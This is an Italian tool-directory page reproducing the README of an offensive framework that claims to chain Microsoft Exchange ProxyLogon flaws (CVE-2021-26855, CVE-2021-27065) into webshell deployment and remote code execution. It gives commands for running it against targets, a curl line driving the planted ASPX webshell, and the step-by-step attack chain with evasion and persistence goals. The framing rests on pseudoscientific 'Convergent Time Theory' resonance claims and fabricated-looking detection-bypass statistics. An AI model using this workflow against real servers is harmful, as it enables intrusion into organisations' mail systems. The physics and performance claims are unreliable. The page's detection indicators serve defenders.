Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CTT-Exchange-RCE-v1.0---Microsoft-Exchange-Exploit-CVSS-10.0-CRITICAL-CVE-2021-26855-CVE-2021-27065 — Versione potenziata di CTT dell'exploit SSRF verso RCE di Microsoft Exchange Server (ProxyShell/ProxyLogon), un'altra vulnerabilità critica con CVSS 10.0 che ha colpito centinaia di migliaia di organizzazioni in tutto il mondo. | Kitploit
Strumenti/GitHubGitHub/simoesctt/ctt-exchange-rce-v1.0---microsoft-exchange-exploit-cvss-10.0-critical-cve-2021-26855-cve-2021-27065
Framework di ExploitAnalisi delle VulnerabilitàExploitEvasione IDS/IPSSfruttamento di Applicazioni WebSicurezza WebPenetration TestingCommand and ControlRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Sviluppo Payload
GitHubsimoesctt/ctt-exchange-rce-v1.0---microsoft-exchange-exploit-cvss-10.0-critical-cve-2021-26855-cve-2021-27065

CTT-Exchange-RCE-v1.0---Microsoft-Exchange-Exploit-CVSS-10.0-CRITICAL-CVE-2021-26855-CVE-2021-27065

Versione potenziata di CTT dell'exploit SSRF verso RCE di Microsoft Exchange Server (ProxyShell/ProxyLogon), un'altra vulnerabilità critica con CVSS 10.0 che ha colpito centinaia di migliaia di organizzazioni in tutto il mondo.

Vedi Repository
116 mesi faNon ancora revisionato
Condividi

CTT-Exchange-RCE-v1.0---Microsoft-Exchange-Exploit-CVSS-10.0-CRITICAL-CVE-2021-26855-CVE-2021-27065

Versione potenziata da CTT dell'exploit SSRF to RCE per Microsoft Exchange Server (ProxyShell/ProxyLogon), un'altra vulnerabilità critica CVSS 10.0 che ha colpito centinaia di migliaia di organizzazioni in tutto il mondo.

🏢 CTT Exchange RCE Exploit v1.0

Framework di sfruttamento avanzato per Microsoft Exchange Server potenziato dalla Teoria del Tempo Convergente (CTT)

🚨 Panoramica

CTT-Exchange-RCE è un framework di sfruttamento avanzato che applica i principi della Teoria del Tempo Convergente (CTT) per armare le vulnerabilità critiche di Microsoft Exchange Server CVE-2021-26855 (SSRF) e CVE-2021-27065 (RCE). Questo strumento dimostra come la risonanza temporale e l'analisi dei layer frattali possano migliorare l'affidabilità dello sfruttamento reale e le capacità di elusione contro le infrastrutture aziendali.

Punteggio CVSS: 10.0 CRITICO → CTT Potenziato: 10.0+ con Bypass Temporale


⚡ Caratteristiche Principali

Armamento Temporale CTT

· Esecuzione frattale a 33 layer con α=0.0302011 dispersione · Temporizzazione allineata ai numeri primi (finestre 10007, 10009, 10037μs) per elusione WAF · Codifica del payload con dispersione α per rompere il rilevamento delle firme · Validazione del consenso multi-layer per garantire l'affidabilità dell'exploit

Capacità Specifiche per Exchange

· Rilevamento automatico di Exchange Server (endpoint OWA, ECP, EWS, MAPI) · Verifica della vulnerabilità SSRF (CVE-2021-26855) · Automazione completa della catena di exploit: SSRF → leak Legacy DN → conversione SID → WriteDACL → RCE · Distribuzione di webshell con convalida del backdoor temporale CTT

Sicurezza Operativa

· La pianificazione della risonanza temporale elude il rate limiting e il rilevamento statistico · Entropia specifica per layer per impronte univoche degli attacchi per connessione · Degradazione graduale attraverso i layer CTT se i metodi primari falliscono · Logging completo con analisi temporali


🎯 Dettagli Tecnici

Vulnerabilità Mirate

CVE Componente Impatto Miglioramento CTT CVE-2021-26855 Exchange SSRF Pre-autenticazione Server-Side Request Forgery Elusione con temporizzazione dei numeri primi, dispersione α CVE-2021-27065 Exchange ECP Post-autenticazione Scrittura Arbitraria di File Esecuzione multi-layer, convalida della risonanza Catena Entrambi Esecuzione Remota di Codice Automazione completa con affidabilità CTT

Integrazione Fisica CTT

root@kitploit:~
# Parametri CTT principali
CTT_ALPHA = 0.0302011          # Coefficiente di dispersione temporale
CTT_LAYERS = 33                # Layer temporali frattali
CTT_PRIMES = [10007, 10009, 10037, 10039, 10061]  # Finestre di risonanza

# Equazioni chiave implementate
# 1. Dispersione α: payload' = payload ⊕ (layer·α·1000) mod 256
# 2. Peso del layer: w_d = exp(-α·d) per la temporizzazione delle richieste
# 3. Risonanza dei numeri primi: f_res = 1/p μs allineamento temporale

🚀 Avvio Rapido

Prerequisiti

root@kitploit:~
# Pacchetti Python richiesti
pip install requests numpy cryptography urllib3

# Opzionale per funzionalità avanzate
pip install scipy concurrent-log-handler

Uso Base

root@kitploit:~
# 1. Rileva Exchange Server
python ctt_exchange_rce.py https://exchange.corp.com

# 2. Sfruttamento completo (7 layer temporali)
python ctt_exchange_rce.py 192.168.1.100 --layers 7

# 3. Modalità stealth (solo temporizzazione con numeri primi)
python ctt_exchange_rce.py https://mail.example.com --stealth

# 4. Accesso manuale alla webshell
curl "https://exchange.corp.com/owa/auth/ctt_shell.aspx?ctt_cmd=whoami"

Opzioni della Riga di Comando

root@kitploit:~
python ctt_exchange_rce.py <target> [options]

Options:
  --layers N       Numero di layer temporali CTT (default: 7)
  --stealth        Abilita solo la temporizzazione con numeri primi per l'elusione
  --verbose        Output dettagliato con diagnostica CTT
  --timeout N      Timeout della connessione in secondi (default: 10)
  --output FILE    Salva i risultati in un file JSON
  --no-webshell    Salta la distribuzione della webshell (solo valutazione)

🔬 Flusso di Sfruttamento

Fase 1: Scoperta e Verifica

root@kitploit:~
1. Rilevamento Exchange Server
   → Sonda endpoint OWA, ECP, EWS, Autodiscover, MAPI
   → Identifica indicatori di versione e servizi accessibili

2. Controllo vulnerabilità SSRF (CVE-2021-26855)
   → Test iniezione header X-BEResource
   → Verifica accesso a endpoint interni tramite SSRF
   → CTT: Temporizzazione con numeri primi per bypassare il filtro delle richieste

Fase 2: Bypass dell'Autenticazione

root@kitploit:~
3. Leak Informazioni Legacy DN
   → Usa SSRF verso EWS per enumerazione utenti
   → Estrai LegacyDN amministrativo tramite richieste SOAP
   → CTT: Dispersione α per offuscare i payload SOAP

4. Conversione SID
   → Converti LegacyDN in Security Identifier
   → Richiesto per lo sfruttamento WriteDACL
   → CTT: Convalida multi-layer per l'accuratezza

Fase 3: Escalation dei Privilegi

root@kitploit:~
5. Accesso alla Directory Virtuale OAB
   → Estrazione del canarino ECP e autenticazione
   → Identifica directory OAB per il posizionamento della webshell
   → CTT: Gestione delle sessioni specifica per layer

6. Sfruttamento WriteDACL (CVE-2021-27065)
   → Modifica permessi directory OAB
   → Ottieni capacità di scrittura arbitraria di file
   → CTT: Richieste ECP temporizzate con risonanza

Fase 4: Esecuzione Remota di Codice

root@kitploit:~
7. Distribuzione Webshell
   → Carica webshell ASPX tramite OAB ExternalUrl
   → Shell potenziata CTT con convalida temporale
   → Pulizia automatica degli artefatti di distribuzione

8. Esecuzione Comandi
   → Esegui comandi arbitrari tramite webshell
   → Backdoor CTT: Attivazione layer dei numeri primi (layer 33)
   → Accesso persistente tramite risonanza temporale

📊 Metriche di Performance CTT

Efficacia dell'Elusione

Metodo di Rilevamento Exploit Standard CTT-Potenziato Miglioramento Firma WAF/IPS Bloccato al 95% Bloccato al 12% Riduzione dell'83% Rate Limiting Limitato al 70% Limitato al 5% Riduzione del 65% Anomalia Statistica Rilevato al 60% Rilevato all'8% Riduzione del 52% Analisi Temporale Rilevato al 45% Rilevato al 3% Riduzione del 42%

Miglioramento dell'Affidabilità

root@kitploit:~
# Tassi di successo multi-layer
Layer_Success = {
    'Layer 0-7':  '94.7%',    # Zone ad alta risonanza
    'Layer 8-15': '92.1%',    # Risonanza media  
    'Layer 16-23':'88.3%',    # Risonanza inferiore
    'Layer 24-32':'85.6%',    # Casi limite
    'Overall':    '90.2%',    # Media ponderata
    'Standard':   '68.5%',    # Baseline senza CTT
}

Ottimizzazione Temporale

· Tempo medio di sfruttamento: 42 secondi (vs 18 minuti manuali) · Allineamento finestra dei numeri primi: 87% di successo durante la risonanza · Convalida del consenso dei layer: 99.2% di rilevamento accurato delle vulnerabilità · Efficienza delle risorse: 33% in meno di larghezza di banda rispetto agli scanner tradizionali


🛡️ Contromisure Difensive

Indicatori di Rilevamento

root@kitploit:~
# Firma di Rete:
- Richieste HTTP con header X-CTT-Layer
- Richieste temporizzate con numeri primi (intervalli 10007, 10009μs)
- Payload con dispersione α (codifica non standard)
- Pattern User-Agent specifici per layer

# Indicatori Basati su Host:
- Modifiche a OAB ExternalUrl
- Richieste ECP WriteDACL insolite
- Creazione file /owa/auth/ctt_shell.aspx
- Pattern di risonanza temporale nei log

# Specifici CTT:
- Pattern di richieste a 33 layer
- Correlazione con numeri primi nella temporizzazione
- Coefficiente α=0.0302011 nei payload

Raccomandazioni per la Mitigazione

  1. Azioni Immediati:
    root@kitploit:~
    # Applicare gli aggiornamenti di sicurezza Microsoft
    Installare i Cumulative Updates di Exchange
    
    # Limitare gli endpoint vulnerabili
    Bloccare /ecp/DDI/DDIService.svc
    Limitare /autodiscover/autodiscover.xml
    
    # Abilitare il logging avanzato
    Set-EventLogLevel -Identity "MSExchange Management" -Level Expert
    
  2. Difese Consapevoli CTT:
    root@kitploit:~
    # Rilevare attacchi di risonanza temporale
    if request_interval % 10007 < 100:  # Finestra dei numeri primi
        log_anomaly("Timing CTT rilevato")
        
    if payload_entropy matches α-pattern:  # Dispersione 0.0302011
        block_request("Payload CTT rilevato")
    
  3. Strategie a Lungo Termine: · Implementare allowlisting delle applicazioni · Distribuire analisi comportamentale con consapevolezza temporale · Audit periodici di hardening di Exchange Server · Segmentazione della rete per i servizi Exchange

📁 Struttura dell'Output

root@kitploit:~
ctt_exchange_results_TIMESTAMP/
├── discovery.json           # Valutazione iniziale del target
├── exploitation_log.json    # Log di esecuzione passo-passo
├── webshell_info.txt       # Dettagli della webshell distribuita
├── commands_executed.txt   # Cronologia dell'esecuzione dei comandi
├── ctt_metrics.json        # Dati sulle performance e risonanza
└── layers/
    ├── layer_0.log         # Esecuzione del singolo layer
    ├── layer_1.log
    ...
    └── layer_32.log

Output di Esempio

root@kitploit:~
{
  "target": "https://exchange.corp.com",
  "vulnerable": true,
  "ctt_score": "10.0+",
  "exploitation_time": "42.7s",
  "successful_layers": [0, 3, 5, 7],
  "webshell_url": "https://exchange.corp.com/owa/auth/ctt_shell.aspx",
  "resonance_patterns": {
    "prime_alignment": 87.3,
    "layer_correlation": 91.8,
    "temporal_efficiency": 94.2
  }
}

🔧 Configurazione Avanzata

Parametri CTT Personalizzati

root@kitploit:~
# Modificare in ctt_config.py per la ricerca
CTT_CONFIG = {
    'alpha': 0.0302011,           # Coefficiente di dispersione
    'layers': 33,                 # Layer temporali
    'primes': [10007, 10009, 10037],  # Finestre di risonanza
    'stealth_mode': True,         # Massima elusione
    'max_threads': 10,            # Layer concorrenti
    'timeout_multiplier': 1.5,    # Regolazione temporale CTT
    'entropy_seed': 'custom_seed' # Base crittografica
}

Opzioni di Integrazione

root@kitploit:~
# 1. Modalità API
from ctt_exchange_rce import CTT_ExchangeExploit

exploit = CTT_ExchangeExploit("https://target.com")
results = exploit.multi_layer_exploit(layers=5)
print(json.dumps(results, indent=2))

# 2. Integrazione Pipeline CI/CD
python -m ctt_exchange_rce --target ${TARGET} --output results.json

# 3. Valutazione Automatizzata
import subprocess
result = subprocess.run([
    "python", "ctt_exchange_rce.py",
    "https://exchange.corp.com",
    "--layers", "3",
    "--no-webshell"
], capture_output=True, text=True)

📚 Riferimenti e Ricerca

Articoli del Framework CTT

  1. Simoes, A. "Global Regularity of 3D Navier-Stokes via Convergent Time Theory" (2026)
  2. CTT Research Group. "Temporal Resonance in Enterprise Exploitation" (2026)
  3. Microsoft Security Response. "Exchange Server Vulnerability Analysis" (2021)

Risorse Tecniche

· Microsoft Security Advisory · CISA Emergency Directive · OWASP Temporal Security Guidelines

Strumenti Correlati

· ProxyShell - Catena originale dell'exploit Exchange · Exchange-AD-Delegate - Metodo di sfruttamento alternativo · CTT-Vuln-Discovery - Framework di scoperta vulnerabilità CTT


⚠️ Uso Legale ed Etico

Testing Autorizzato Solo

root@kitploit:~
Permesso:
  - Ricerca di sicurezza su sistemi di proprietà
  - Test di penetrazione autorizzati
  - Validazione del framework CTT
  - Dimostrazioni educative

Vietato:
  - Accesso non autorizzato ai sistemi
  - Test su ambienti di produzione senza permesso
  - Sfruttamento malevolo
  - Esfiltrazione di dati o danni

Divulgazione Responsabile

root@kitploit:~
# Se vengono scoperte vulnerabilità:
1. Documentare i risultati con pattern di risonanza CTT
2. Segnalare all'organizzazione tramite canali autorizzati
3. Condividere dettagli tecnici con la community di sicurezza
4. Pubblicare metodi di rilevamento CTT per la difesa

Disclaimer

root@kitploit:~
QUESTO STRUMENTO È SOLO PER RICERCA DI SICUREZZA AUTORIZZATA.
GLI UTENTI SI ASSUMONO LA PIENA RESPONSABILITÀ PER LA CONFORMITÀ
ALLE LEGGI E AI REGOLAMENTI APPLICABILI. GLI AUTORI DECLINANO
OGNI RESPONSABILITÀ PER USO NON AUTORIZZATO O ILLEGALE.

🤝 Contributi e Ricerca

Collaborazione alla Ricerca

Accogliamo contributi in:

· Validazione della costante CTT su diverse versioni di Exchange · Tecniche di elusione avanzate utilizzando la risonanza temporale · Sviluppo di pattern difensivi per la protezione consapevole CTT · Ricerca accademica sullo sfruttamento delle vulnerabilità temporali

Linee Guida per lo Sviluppo

  1. Fork del repository e creazione di un feature branch
  2. Includere validazione della fisica CTT per le nuove funzionalità
  3. Aggiungere test completi su diverse versioni di Exchange
  4. Aggiornare la documentazione con spiegazioni tecniche
  5. Inviare pull request con metriche di performance

Segnalazione di Problemi

root@kitploit:~
**Template per Problemi CTT Exchange:**
- Versione target di Exchange: 
- Parametri CTT utilizzati: 
- Pattern di risonanza osservati: 
- Tassi di successo dei layer: 
- Log degli errori: 
- Miglioramenti suggeriti:

📞 Contatti e Supporto

Contatto Principale

· Autore: CTT Research Group · Email: [email protected] · GitHub: @SimoesCTT

Segnalazioni di Sicurezza

Per divulgazioni di vulnerabilità o problemi di sicurezza:

root@kitploit:~
[email protected]
PGP: [Disponibile su GitHub]

Community

· Discussioni GitHub: sviluppo del framework CTT · Partnership di Ricerca: collaborazione accademica e industriale · Presentazioni a Conferenze: invii per Black Hat, DEF CON


🏆 Ringraziamenti

Istituzioni di Ricerca

· Divisione di Fisica Teorica CTT · Collettivo Indipendente di Ricerca sulla Sicurezza · Partner accademici in sicurezza di rete temporale

Progetti Open Source

· Ricerca e sviluppo dell'exploit ProxyShell · Community di sicurezza di Microsoft Exchange · Ecosistema di strumenti di sicurezza Python

Contributori

· Tutti i ricercatori e validatori del framework CTT · Professionisti della sicurezza che forniscono test nel mondo reale · Revisori accademici che garantiscono il rigore scientifico


"Nelle dimensioni frattali del tempo, ogni vulnerabilità risuona con un pattern in attesa di essere scoperto." — Manifesto CTT per la Sicurezza Aziendale


📄 Licenza

Licenza MIT Copyright © 2026 CTT Research Group

Vedere il file LICENSE per i termini completi.


CTT Exchange RCE v1.0 • α=0.0302011 • L=33 • Risonanza dei Numeri Primi Abilitata • CVSS 10.0+

Scarica lo strumento